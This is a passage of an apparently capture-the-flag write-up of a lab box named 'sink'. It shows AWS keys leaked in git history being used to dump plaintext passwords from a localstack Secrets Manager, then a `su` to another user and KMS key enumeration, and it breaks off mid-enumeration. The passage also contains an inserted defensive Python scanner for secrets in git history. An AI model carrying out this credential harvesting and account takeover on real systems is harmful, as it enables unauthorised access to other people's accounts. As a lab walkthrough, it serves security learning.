root        3098  0.0  0.1 110108  5264 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/1bc3f322af051da6cd4401088791d40adc0a8dbd68948dd89ff185d82806d48e -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3275  0.0  0.5  63396 20276 ?        Ss   15:27   0:06  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3995  0.0  0.6 106312 26720 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4205  0.2  0.8 132136 33420 ?        S    15:28   0:33  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3996  0.0  0.1  27992  4332 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      3998  0.2  0.5  63908 20808 ?        S    15:28   0:34  |       \_ python3 /home/bot/bot.py
root        4957  0.1  0.4 356196 16372 ?        Sl   15:28   0:20  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        3128  0.0  0.1 110108  6088 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/07c9fe1b8aeab2e9f73938744139b799c6500b7d659bfe85e14c410f51e63cc0 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3298  0.0  0.5  63508 20228 ?        Ss   15:27   0:07  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3953  0.0  0.6 106312 26800 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4186  0.2  0.8 132392 33460 ?        S    15:28   0:33  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3954  0.0  0.1  27992  4296 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      4174  0.2  0.5  63908 20812 ?        S    15:28   0:33  |       \_ python3 /home/bot/bot.py
root        5455  0.1  0.4 356196 16452 ?        Sl   15:29   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        3164  0.0  0.1 108700  6300 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/3a88a256bfea60473c4bb9ba606b5d00bf7cedd57fb6b9ce4051b59437750fbe -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3292  0.0  0.4  63508 20148 ?        Ss   15:27   0:06  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        4014  0.0  0.6 106312 26796 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4351  0.2  0.8 132132 33340 ?        S    15:28   0:33  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    4016  0.0  0.1  27992  4444 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      4019  0.2  0.5  63908 20828 ?        S    15:28   0:34  |       \_ python3 /home/bot/bot.py
root        4797  0.1  0.4 356196 16372 ?        Sl   15:28   0:20  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        3170  0.0  0.1 108700  5968 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/ecccc85cc66654f646bd67a701da06876bdd74fe252864ecaf8b883c867f057b -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3443  0.0  0.4  63512 20124 ?        Ss   15:27   0:07  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        4095  0.0  0.6 106312 26724 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4236  0.2  0.8 132140 33484 ?        R    15:28   0:33  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    4096  0.0  0.1  27992  4348 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      4213  0.2  0.5  63908 20916 ?        R    15:28   0:33  |       \_ python3 /home/bot/bot.py
root        4903  0.1  0.4 356196 16428 ?        Sl   15:28   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        3201  0.0  0.1 108700  5200 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/4348cfb57a494da8071c4550915a05c79960fc34fc0e14ae92681a505e15dfda -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3452  0.0  0.5  63508 20184 ?        Ss   15:27   0:06  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3839  0.0  0.6 106312 26688 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       3942  0.2  0.8 132140 33576 ?        S    15:28   0:33  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3840  0.0  0.1  27992  4336 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      3841  0.2  0.5  63908 20828 ?        S    15:28   0:33  |       \_ python3 /home/bot/bot.py
root        5010  0.1  0.4 356196 16436 ?        Sl   15:28   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        3221  0.0  0.1 108700  5200 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/ed03a109bb55eef306fcc6dae07b0ba6d0aa5daac480ff42303c2f12a8ab0963 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3458  0.0  0.5  63508 20268 ?        Ss   15:27   0:06  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3870  0.0  0.6 106312 26700 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4129  0.2  0.8 132136 33564 ?        S    15:28   0:33  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3871  0.0  0.1  27992  4424 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      3873  0.2  0.5  63908 20952 ?        S    15:28   0:33  |       \_ python3 /home/bot/bot.py
root        5404  0.1  0.4 356196 16364 ?        Sl   15:29   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        3450  0.0  0.1 110108  5136 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/3d55d9da52f0abb4413fb45779148dde0e2249cb5f1bf6f9daab4775c60679ce -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3569  0.0  0.5  63508 20232 ?        Ss   15:27   0:07  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        4028  0.0  0.6 106312 26924 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4211  0.2  0.8 132136 33452 ?        S    15:28   0:33  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    4029  0.0  0.1  27992  4332 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      4030  0.2  0.5  63908 20752 ?        S    15:28   0:34  |       \_ python3 /home/bot/bot.py
root        4743  0.1  0.4 356196 16336 ?        Sl   15:28   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        3469  0.0  0.1 110108  5768 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/2bc3df8be4ea361041e8da478cc3e49b4ab0ea3362e5d59cf69573d6aa2dc493 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3585  0.0  0.5  63508 20336 ?        Ss   15:27   0:07      \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        4067  0.0  0.6 106312 26708 ?        S    15:28   0:02          \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4192  0.2  0.8 132132 33580 ?        S    15:28   0:33          |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    4069  0.0  0.1  27992  4296 ?        S    15:28   0:05          \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      4070  0.2  0.5  63908 20912 ?        S    15:28   0:33          \_ python3 /home/bot/bot.py
root        5243  0.1  0.4 356196 16372 ?        Sl   15:29   0:20          \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        1151  0.0  0.5 544480 21836 ?        Ssl  15:27   0:10 /usr/bin/python3 /usr/bin/fail2ban-server -xf start
daemon      1152  0.0  0.0   3792  2320 ?        Ss   15:27   0:00 /usr/sbin/atd -f
root        1172  0.0  0.0   5828  1884 tty1     Ss+  15:27   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root        1174  0.0  0.5 107872 20732 ?        Ssl  15:27   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root        1192  0.0  0.1  12168  7296 ?        Ss   15:27   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root       14512  0.0  0.2  13776  8992 ?        Ss   19:15   0:00  \_ sshd: marcus [priv]
marcus     14643  0.0  0.1  13908  6032 ?        S    19:15   0:00      \_ sshd: marcus@pts/0
marcus     14644  0.0  0.1   8276  5236 pts/0    Ss   19:15   0:00          \_ -bash
marcus     15303  0.0  0.0   9308  3816 pts/0    R+   19:33   0:00              \_ ps auxwww --forest
mysql       1245  0.2  9.8 1743604 396684 ?      Ssl  15:27   0:31 /usr/sbin/mysqld
root        1777  0.0  2.2 1606932 92692 ?       Ssl  15:27   0:05 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root        2554  0.0  0.1 548504  4444 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 4566 -container-ip 172.18.0.2 -container-port 4566
root        2559  0.0  0.0 475924  3424 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6005 -container-ip 172.17.0.2 -container-port 8080
root        2610  0.0  0.0 548248  2932 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6009 -container-ip 172.17.0.3 -container-port 8080
root        2655  0.0  0.0 400784  2936 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6001 -container-ip 172.17.0.4 -container-port 8080
root        2671  0.0  0.0 548248  3012 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6000 -container-ip 172.17.0.5 -container-port 8080
root        2727  0.0  0.0 475924  2920 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6008 -container-ip 172.17.0.6 -container-port 8080
root        2811  0.0  0.0 474516  2964 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6004 -container-ip 172.17.0.7 -container-port 8080
root        2857  0.0  0.0 402192  2912 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6013 -container-ip 172.17.0.8 -container-port 8080
root        2878  0.0  0.0 548248  2948 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6007 -container-ip 172.17.0.9 -container-port 8080
root        2928  0.0  0.0 549656  3032 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6002 -container-ip 172.17.0.10 -container-port 8080
root        2978  0.0  0.0 474516  3048 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6011 -container-ip 172.17.0.11 -container-port 8080
root        3020  0.0  0.0 474516  3052 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6014 -container-ip 172.17.0.12 -container-port 8080
root        3054  0.0  0.0 400784  2956 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6012 -container-ip 172.17.0.13 -container-port 8080
root        3086  0.0  0.0 400784  3028 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6010 -container-ip 172.17.0.14 -container-port 8080
root        3114  0.0  0.0 548248  3056 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6003 -container-ip 172.17.0.15 -container-port 8080
root        3149  0.0  0.0 400784  2960 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6015 -container-ip 172.17.0.16 -container-port 8080
root        3229  0.0  0.0 400784  3020 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6006 -container-ip 172.17.0.17 -container-port 8080
root        2480  0.0  0.1  38036  4712 ?        Ss   15:27   0:00 /usr/lib/postfix/sbin/master -w
postfix     2495  0.0  0.1  38348  6232 ?        S    15:27   0:00  \_ qmgr -l -t unix -u
postfix    13290  0.0  0.1  38308  6052 ?        S    18:44   0:00  \_ pickup -l -t unix -u -c
marcus     14534  0.0  0.2  18784 10112 ?        Ss   19:15   0:00 /lib/systemd/systemd --user
marcus     14535  0.0  0.0 169148  3672 ?        S    19:15   0:00  \_ (sd-pam)

Looking through the running processes, we can see that this is a containerized app. To backtrack a moment, I checked the other repos in Gitea. There is a repo called Serverless-Plugin, and its history shows a Dockerfile being set up with localstack. I typed aws [tab] [tab] to see what bash completion offers, and there is a command called awslocal.

marcus@sink:/home$ aws
aws                   aws_bash_completer    aws.cmd               aws_completer         awslocal              awslocal.bat          aws_zsh_completer.sh

I went back to check out the repos and wanted to take a look at Log Management, since we know that an AWS service is being used on the Gitea server. I checked the Log_Management commit history, and one of the commits shows AWS secrets being committed to the git repo.
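From the defender's side, the same finding can be caught by scanning commit history rather than only the current tree. The scanner below is an added example, not part of the original write-up: it walks `git log -p` output and reports AWS access key IDs and high-entropy 40-character values on added and removed lines, because a later "remove credentials" commit still leaves the values in history. The history excerpt, file name and commit IDs are constructed, and the key pair is the placeholder pair from AWS documentation.

```python
import math
import re
from collections import Counter

# Constructed `git log -p` excerpt (newest commit first). The key pair is the
# placeholder pair from AWS documentation; the file name is hypothetical.
SAMPLE_HISTORY = """\
commit 2222222222222222222222222222222222222222
Author: dev <dev@example.invalid>

    Remove hardcoded credentials

diff --git a/create_logs.php b/create_logs.php
--- a/create_logs.php
+++ b/create_logs.php
@@ -1,4 +1,4 @@
 $client = new CloudWatchLogsClient([
-    'key' => 'AKIAIOSFODNN7EXAMPLE',
-    'secret' => 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY',
+    'key' => getenv('AWS_KEY'),
+    'secret' => getenv('AWS_SECRET'),
 ]);

commit 1111111111111111111111111111111111111111
Author: dev <dev@example.invalid>

    Add log creation script

diff --git a/create_logs.php b/create_logs.php
--- /dev/null
+++ b/create_logs.php
@@ -0,0 +1,4 @@
+$client = new CloudWatchLogsClient([
+    'key' => 'AKIAIOSFODNN7EXAMPLE',
+    'secret' => 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY',
+]);
"""

# AKIA = long-term key ID, ASIA = temporary (STS) key ID.
ACCESS_KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")
# A 40-character base64-alphabet run that is not part of a longer run.
SECRET_CANDIDATE = re.compile(
    r"(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])")
COMMIT_LINE = re.compile(r"^commit ([0-9a-f]{40})$")


def entropy(s):
    """Shannon entropy in bits per character."""
    counts = Counter(s)
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def redact(value):
    """Keep enough of the value to identify it without re-leaking it."""
    return value[:4] + "..." + value[-4:]


def scan_history(log_text):
    """Return (commit, path, side, kind, redacted value) for each hit."""
    findings, commit, path = [], None, None
    for line in log_text.splitlines():
        m = COMMIT_LINE.match(line)
        if m:
            commit, path = m.group(1)[:8], None
            continue
        if line.startswith(("+++ ", "--- ")):  # file headers, not content
            target = line[4:]
            if target != "/dev/null":
                path = target[2:] if target[:2] in ("a/", "b/") else target
            continue
        if commit is None or line[:1] not in ("+", "-"):
            continue  # commit message, hunk header or unchanged context
        side = "added" if line[0] == "+" else "removed"
        for m in ACCESS_KEY_ID.finditer(line[1:]):
            findings.append((commit, path, side, "access_key_id", redact(m.group())))
        for m in SECRET_CANDIDATE.finditer(line[1:]):
            # A 40-char hex digest can never exceed 4.0 bits per character,
            # so this threshold drops SHA-1 strings and keeps random secrets.
            if entropy(m.group()) > 4.0:
                findings.append((commit, path, side, "secret_candidate", redact(m.group())))
    return findings


def first_added(findings):
    """Map each value to the oldest commit that added it (rotate from there)."""
    oldest = {}
    for commit, _path, side, _kind, value in findings:  # newest first
        if side == "added":
            oldest[value] = commit  # later rows are older, so overwrite
    return oldest
```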

I went ahead and set up the AWS credentials.

marcus@sink:/home$ awslocal lambda list-functions

An error occurred (400) when calling the ListFunctions operation: 
marcus@sink:/home$ aws cloudwatch describe-insight-rules
You must specify a region. You can also configure your region by running "aws configure".
marcus@sink:/home$ aws configure
AWS Access Key ID [None]: AKIAIUEN3QWCPSTEITJQ
AWS Secret Access Key [None]: paVI8VgTWkPI3jDNkdzUMvK4CcdXO2T7sePX0ddF
Default region name [None]: eu
Default output format [None]: 
marcus@sink:/home$ aws cloudwatch describe-insight-rules

Could not connect to the endpoint URL: "https://monitoring.eu.amazonaws.com/"

Check logs

awslocal logs describe-log-groups
{
    "logGroups": [
        {
            "logGroupName": "cloudtrail",
            "creationTime": 1633203781293,
            "metricFilterCount": 0,
            "arn": "arn:aws:logs:us-east-1:000000000000:log-group:cloudtrail",
            "storedBytes": 91
        }
    ]
}
marcus@sink:/home$ awslocal logs describe-log-streams --log-group-name cloudtrail
{
    "logStreams": [
        {
            "logStreamName": "20201222",
            "creationTime": 1633204081989,
            "firstEventTimestamp": 1126190184356,
            "lastEventTimestamp": 1533190184356,
            "lastIngestionTime": 1633204082014,
            "uploadSequenceToken": "1",
            "arn": "arn:aws:logs:us-east-1:259:log-group:cloudtrail:log-stream:20201222",
            "storedBytes": 91
        }
    ]
}
marcus@sink:/home$ awslocal logs describe-log-streams --log-group-name cloudtrail --log-stream-name 20201222
{
    "logStreams": [
        {
            "logStreamName": "20201222",
            "creationTime": 1633204081989,
            "firstEventTimestamp": 1126190184356,
            "lastEventTimestamp": 1533190184356,
            "lastIngestionTime": 1633204082014,
            "uploadSequenceToken": "1",
            "arn": "arn:aws:logs:us-east-1:259:log-group:cloudtrail:log-stream:20201222",
            "storedBytes": 91
        }
    ]
}

awslocal logs get-log-events --log-group-name cloudtrail --log-stream-name 20201222
{
    "events": [
        {
            "timestamp": 1126190184356,
            "message": "RotateSecret",
            "ingestionTime": 1633204141150
        },
        {
            "timestamp": 1244190184360,
            "message": "TagResource",
            "ingestionTime": 1633204141150
        },
        {
            "timestamp": 1412190184358,
            "message": "PutResourcePolicy",
            "ingestionTime": 1633204141150
        },
        {
            "timestamp": 1433190184356,
            "message": "AssumeRole",
            "ingestionTime": 1633204141150
        },
        {
            "timestamp": 1433190184358,
            "message": "PutScalingPolicy",
            "ingestionTime": 1633204141150
        },
        {
            "timestamp": 1433190184360,
            "message": "RotateSecret",
            "ingestionTime": 1633204141150
        },
        {
            "timestamp": 1533190184356,
            "message": "RestoreSecret",
            "ingestionTime": 1633204141150
        }
    ],
    "nextForwardToken": "f/00000000000000000000000000000000000000000000000000000006",
    "nextBackwardToken": "b/00000000000000000000000000000000000000000000000000000000"
}

Check Secrets Manager

awslocal secretsmanager list-secrets
{
    "SecretList": [
        {
            "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-gBBmE",
            "Name": "Jenkins Login",
            "Description": "Master Server to manage release cycle 1",
            "KmsKeyId": "",
            "RotationEnabled": false,
            "RotationLambdaARN": "",
            "RotationRules": {
                "AutomaticallyAfterDays": 0
            },
            "Tags": [],
            "SecretVersionsToStages": {
                "64b317d7-c211-4bf6-a194-7a0f199ea695": [
                    "AWSCURRENT"
                ]
            }
        },
        {
            "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-PQsKL",
            "Name": "Sink Panel",
            "Description": "A panel to manage the resources in the devnode",
            "KmsKeyId": "",
            "RotationEnabled": false,
            "RotationLambdaARN": "",
            "RotationRules": {
                "AutomaticallyAfterDays": 0
            },
            "Tags": [],
            "SecretVersionsToStages": {
                "daece332-d665-494e-b16e-1d10a805f2a3": [
                    "AWSCURRENT"
                ]
            }
        },
        {
            "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-ilvIs",
            "Name": "Jira Support",
            "Description": "Manage customer issues",
            "KmsKeyId": "",
            "RotationEnabled": false,
            "RotationLambdaARN": "",
            "RotationRules": {
                "AutomaticallyAfterDays": 0
            },
            "Tags": [],
            "SecretVersionsToStages": {
                "9711b975-0382-4ab5-9e58-108963b139db": [
                    "AWSCURRENT"
                ]
            }
        }
    ]
}

Check out secret value

awslocal secretsmanager get-secret-value --secret-id "Jenkins Login"
{
    "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-gBBmE",
    "Name": "Jenkins Login",
    "VersionId": "64b317d7-c211-4bf6-a194-7a0f199ea695",
    "SecretString": "{\"username\":\"[email protected]\",\"password\":\"R);\\)ShS99mZ~8j\"}",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": 1633188560
}

awslocal secretsmanager get-secret-value --secret-id "Sink Panel"
{
    "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-PQsKL",
    "Name": "Sink Panel",
    "VersionId": "daece332-d665-494e-b16e-1d10a805f2a3",
    "SecretString": "{\"username\":\"[email protected]\",\"password\":\"Welcome123!\"}",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": 1633188560
}

awslocal secretsmanager get-secret-value --secret-id "Jira Support"
{
    "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-ilvIs",
    "Name": "Jira Support",
    "VersionId": "9711b975-0382-4ab5-9e58-108963b139db",
    "SecretString": "{\"username\":\"[email protected]\",\"password\":\"EALB=bcC=`a7f2#k\"}",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": 1633188560
}

Since we already checked the home directories, we can try logging in as david.

marcus@sink:/home$ su david
Password:
david@sink:/home$

Enumerate david's home directory

david@sink:~$ find Projects/ -type -ls
find: Unknown argument to -type: -
david@sink:~$ find Projects/ -type f -ls
   393283      4 -rw-r-----   1 david    david         512 Feb  1  2021 Projects/Prod_Deployment/servers.enc
david@sink:~$ file Projects/Prod_Deployment/servers.enc 
Projects/Prod_Deployment/servers.enc: data
david@sink:~$ xxd Projects/Prod_Deployment/servers.enc 

Going back to the repos, I wanted to look at Key_Management. I noticed that several tools were being used, one of which is AWS KMS.

david@sink:~$ awslocal help | grep -i kms
       o kms
david@sink:~$ awslocal kms list-keys
{
    "Keys": [
        {
            "KeyId": "0b539917-5eff-45b2-9fa1-e13f0d2c42ac",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/0b539917-5eff-45b2-9fa1-e13f0d2c42ac"
        },
        {
            "KeyId": "16754494-4333-4f77-ad4c-d0b73d799939",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/16754494-4333-4f77-ad4c-d0b73d799939"
        },
        {
            "KeyId": "2378914f-ea22-47af-8b0c-8252ef09cd5f",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/2378914f-ea22-47af-8b0c-8252ef09cd5f"
        },
        {
            "KeyId": "2bf9c582-eed7-482f-bfb6-2e4e7eb88b78",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/2bf9c582-eed7-482f-bfb6-2e4e7eb88b78"
        },
        {
            "KeyId": "53bb45ef-bf96-47b2-a423-74d9b89a297a",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/53bb45ef-bf96-47b2-a423-74d9b89a297a"
        },
        {
            "KeyId": "804125db-bdf1-465a-a058-07fc87c0fad0",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/804125db-bdf1-465a-a058-07fc87c0fad0"
        },
        {
            "KeyId": "837a2f6e-e64c-45bc-a7aa-efa56a550401",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/837a2f6e-e64c-45bc-a7aa-efa56a550401"
        },
        {
            "KeyId": "881df7e3-fb6f-4c7b-9195-7f210e79e525",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/881df7e3-fb6f-4c7b-9195-7f210e79e525"
        },
        {
            "KeyId": "c5217c17-5675-42f7-a6ec-b5aa9b9dbbde",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/c5217c17-5675-42f7-a6ec-b5aa9b9dbbde"
        },
        {
            "KeyId": "f0579746-10c3-4fd1-b2ab-f312a5a0f3fc",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/f0579746-10c3-4fd1-b2ab-f312a5a0f3fc"
        },
        {
            "KeyId": "f2358fef-e813-4c59-87c8-70e50f6d4f70",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/f2358fef-e813-4c59-87c8-70e50f6d4f70"
        }
    ]
}

Keep looking

david@sink:~$ awslocal kms describe-key --key-id 0b539917-5eff-45b2-9fa1-e13f0d2c42ac
{
    "KeyMetadata": {
        "AWSAccountId": "000000000000",
        "KeyId": "0b539917-5eff-45b2-9fa1-e13f0d2c42ac",
        "Arn": "arn:aws:kms:us-east-1:000000000000:key/0b539917-5eff-45b2-9fa1-e13f0d2c42ac",
        "CreationDate": 1609757848,
        "Enabled": false,
        "Description": "Encryption and Decryption",
        "KeyUsage": "ENCRYPT_DECRYPT",
        "KeyState": "Disabled",
        "Origin": "AWS_KMS",
        "KeyManager": "CUSTOMER",
        "CustomerMasterKeySpec": "RSA_4096",
        "EncryptionAlgorithms": [
            "RSAES_OAEP_SHA_1",
            "RSAES_OAEP_SHA_256"
        ]
    }
}
david@sink:~$ awslocal kms list-keys | grep KeyId | cut -d'"'
cut: you must specify a list of bytes, characters, or fields
Try 'cut --help' for more information.
david@sink:~$ awslocal kms list-keys | grep KeyId | cut -d'"' -f4
0b539917-5eff-45b2-9fa1-e13f0d2c42ac
16754494-4333-4f77-ad4c-d0b73d799939
2378914f-ea22-47af-8b0c-8252ef09cd5f
2bf9c582-eed7-482f-bfb6-2e4e7eb88b78
53bb45ef-bf96-47b2-a423-74d9b89a297a
804125db-bdf1-465a-a058-07fc87c0fad0
837a2f6e-e64c-45bc-a7aa-efa56a550401
881df7e3-fb6f-4c7b-9195-7f210e79e525
c5217c17-5675-42f7-a6ec-b5aa9b9dbbde
f0579746-10c3-4fd1-b2ab-f312a5a0f3fc
